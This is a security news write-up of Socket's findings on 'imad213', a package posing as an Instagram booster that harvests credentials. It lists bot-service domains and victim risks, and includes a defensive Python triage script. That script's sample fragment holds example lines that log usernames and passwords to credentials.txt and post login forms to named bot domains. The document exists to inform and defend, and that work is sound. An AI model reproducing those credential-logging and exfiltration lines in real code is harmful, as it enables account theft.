
Socket’s Threat Research Team has uncovered ‘imad213’, a credential-harvesting tool masquerading as an Instagram booster. Behind its sleek GitHub presentation lies a malware operation built by threat actor im_ad__213, leveraging deception, social engineering, and coordinated bot services to exploit unsuspecting users.
Distributed through GitHub and PyPI, imad213 comes with convincing documentation and a faux safety disclaimer:
“Requires a Temporary Account: Safely use a fake or temporary Instagram account to avoid risks to your main account.”
This reassurance lulls users into entering real credentials into the tool, which claims to boost followers but instead logs credentials to a local credentials.txt file and then broadcasts them to ten third-party bot services.
“This local storage serves as social engineering, making the tool appear legitimate with a ‘convenience’ feature for saving login details,” Socket explains.
What makes imad213 especially insidious is its remote kill switch—a control mechanism hosted on Netlify.
The malware checks this URL before proceeding, allowing the attacker to:
- Control who runs the tool
- Shut it down globally during investigations
- Evade analysis by making the malware appear inactive
- Redirect victims to the attacker’s own Instagram account for self-promotion
“This gives the attacker remote control over their malware, like having a master switch that can turn off all copies at once,” Socket warns.
Once activated, imad213 sends Instagram credentials to ten different Turkish bot services, each disguised as a legitimate Instagram growth platform:
- takipcimx[.]net
- takipciking[.]net
- bigtakip[.]net
- instamoda[.]org
- … and more.
These services display disclaimers like “This site has no connection to Instagram” while covertly ingesting login data.
“The backend receives the complete login credentials… victims have no visibility into what actually happens with their credentials once submitted.”
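As an added illustration of how a defender might triage a suspicious PyPI package for the behaviour described above (this is example code written for this page, not Socket’s tooling or the imad213 package itself), the script below statically scans Python source text for the three indicators the write-up names: a gate URL on Netlify fetched before the tool runs, credentials appended to a local credentials.txt, and HTTP requests to the bot-service domains listed. The sample source fragments and the Netlify hostname are constructed placeholders, not values from the real package.

```python
import re

# Indicators taken from the behaviour described in the write-up: a Netlify gate URL,
# credentials appended to credentials.txt, and requests to the named bot-service domains.
BOT_SERVICE_DOMAINS = {"takipcimx.net", "takipciking.net", "bigtakip.net", "instamoda.org"}

CRED_FILE_RE = re.compile(r"""open\(\s*['"][^'"]*credentials\.txt['"]\s*,\s*['"][aw]""")
URL_RE = re.compile(r"""https?://([A-Za-z0-9.-]+)""")


def registrable_domain(host: str) -> str:
    """Crude eTLD+1: the last two labels, enough for the .net/.org domains listed."""
    return ".".join(host.lower().split(".")[-2:])


def triage_source(src: str) -> dict:
    """Statically triage Python source text for the imad213-style indicator set."""
    hosts = URL_RE.findall(src)
    gate_hosts = sorted({h for h in hosts if h.lower().endswith(".netlify.app")})
    bot_hosts = sorted({h for h in hosts if registrable_domain(h) in BOT_SERVICE_DOMAINS})
    return {
        "credential_file_write": bool(CRED_FILE_RE.search(src)),
        "gate_hosts": gate_hosts,
        "bot_service_hosts": bot_hosts,
    }


def verdict(findings: dict) -> str:
    """Escalate when local credential logging is paired with delivery to a bot service."""
    exfil = bool(findings["bot_service_hosts"])
    if findings["credential_file_write"] and exfil:
        return "high"
    if exfil or findings["gate_hosts"]:
        return "medium"
    return "low"


# Constructed sample fragments (not the real package) mirroring the described indicators;
# the Netlify hostname is a placeholder, since the page does not give the real gate URL.
SAMPLE_SOURCE = '''
status = requests.get("https://placeholder-gate.netlify.app/status").text
with open("credentials.txt", "a") as fh:
    fh.write(f"{username}:{password}\\n")
requests.post("https://takipcimx.net/api/login", data=form)
requests.post("https://www.bigtakip.net/api/login", data=form)
'''

if __name__ == "__main__":
    result = triage_source(SAMPLE_SOURCE)
    print(result, verdict(result))
```

The domain list is deliberately limited to the four hosts the write-up names; extend it from the full Socket report before using this in a package-review pipeline.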
Socket’s analysis revealed a disturbing level of coordination among the bot services:
- Same Turkish registrar and privacy protection
- Domain creation within days of each other (June 2021)
- Shared Cloudflare infrastructure for DDoS protection
- Detected by security vendors for phishing activity
“This coordination strongly suggests these sites are operated by the same entity… a long-term credential harvesting operation rather than a temporary scam.”
Victims of this scam face numerous risks:
- Immediate account compromise: Attackers can change passwords, access messages, or post spam.
- Instagram policy violations: Use of bot services violates Instagram’s Terms of Use and may lead to permanent account bans.
- Cross-site password reuse risk: If the Instagram password is reused, other accounts can also be compromised.
- Identity theft potential: Access to photos, contacts, and DMs can be used for further impersonation.